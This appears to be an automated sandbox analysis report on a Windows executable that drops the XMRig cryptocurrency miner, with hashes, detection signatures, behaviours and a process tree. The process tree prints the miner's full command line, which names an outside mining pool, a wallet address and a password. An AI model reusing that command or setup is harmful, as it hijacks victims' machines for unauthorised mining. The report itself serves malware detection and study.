Analysis
-
max time kernel
15s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
27/10/2024, 12:30
Static task
static1
Behavioral task
behavioral1
Sample
1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe
Resource
win7-20240903-en
General
-
Target
1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe
-
Size
2.4MB
-
MD5
f7a709560c8c538bf840d38adad98060
-
SHA1
4396b0b5699837c1fddedb91c832b09a6a9ca2b9
-
SHA256
1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97
-
SHA512
5cec8dc34a2df3d62aa056b1826708d6e1e81d6d87bac2074fdc243e614e191799366e9411f0c7e48e74799131a0eb02916e7b10a5f63a81e0997482c3d1ca99
-
SSDEEP
49152:nILryvOacuT9fbDxw6++uxp+NqiurJoP6rZ0B1qxtVujoiJ67XoifXUGOOnx:n3zfaJ+uxp+8rZ9t8JQfEQx
Malware Config
Signatures
-
XMRig Miner payload 2 IoCs
resource yara_rule behavioral1/files/0x0008000000017403-20.dat family_xmrig behavioral1/files/0x0008000000017403-20.dat xmrig -
Xmrig family
-
Executes dropped EXE 1 IoCs
pid Process 1480 xmrig.exe -
Loads dropped DLL 1 IoCs
pid Process 2704 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 2 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeLockMemoryPrivilege 1480 xmrig.exe Token: SeLockMemoryPrivilege 1480 xmrig.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1480 xmrig.exe -
Suspicious use of WriteProcessMemory 8 IoCs
description pid Process procid_target PID 2108 wrote to memory of 2704 2108 1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe 30 PID 2108 wrote to memory of 2704 2108 1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe 30 PID 2108 wrote to memory of 2704 2108 1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe 30 PID 2108 wrote to memory of 2704 2108 1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe 30 PID 2704 wrote to memory of 1480 2704 cmd.exe 32 PID 2704 wrote to memory of 1480 2704 cmd.exe 32 PID 2704 wrote to memory of 1480 2704 cmd.exe 32 PID 2704 wrote to memory of 1480 2704 cmd.exe 32
Processes
-
C:\Users\Admin\AppData\Local\Temp\1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe"C:\Users\Admin\AppData\Local\Temp\1214286113800f855601b0317bf0bb73044f48606d412f99ca0bf2b4601bff97N.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\1.cmd" "2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Users\Admin\AppData\Local\Temp\xmrig.exexmrig --url pool.hashvault.pro:80 --user 44nkuDevyMkUnE7Lc4kJThfZqW3zyQ62nZxB9Ca6ikxTK7SMYdLmb9eSdp3PcYDwziHMN1xyq3Yq7BNcbGXDCBhWMzEVEBX --pass UOO3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1480
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
182B
MD55ee6977e66bcd50d25effdec2d2a23d0
SHA1d6817af66d573ee64e29dec0bc7e47e732b0da3c
SHA256a42894d4886ca4eb3fe3ea985ece123987008b7644ca18fa9837d28e8fbb5488
SHA51230a508e5282aa263f3dafc36a0fcc6675b3105da4e70cfa4176416c893e441695336335d128d680bdee4cbf2b2defe9fdc3adba7116ad0a5631e3433390936f3
-
Filesize
6.1MB
MD55fba8ae226b096da3b31de0e17496735
SHA1d532a01254cf9e0229d3c5803b78ff7c9b0cb8d3
SHA256ca28f4aeaa5e16d216cd828b67454a56f3c7feeb242412d26ed914fadff20d40
SHA512951e44fc0864a6741bcbb4227feb5429a032713dabd91102f4f0e27a69181ce7f23562e902cc09896ae26334b6d18caf0f5a13d81370bd703fd7ed6f78b47e72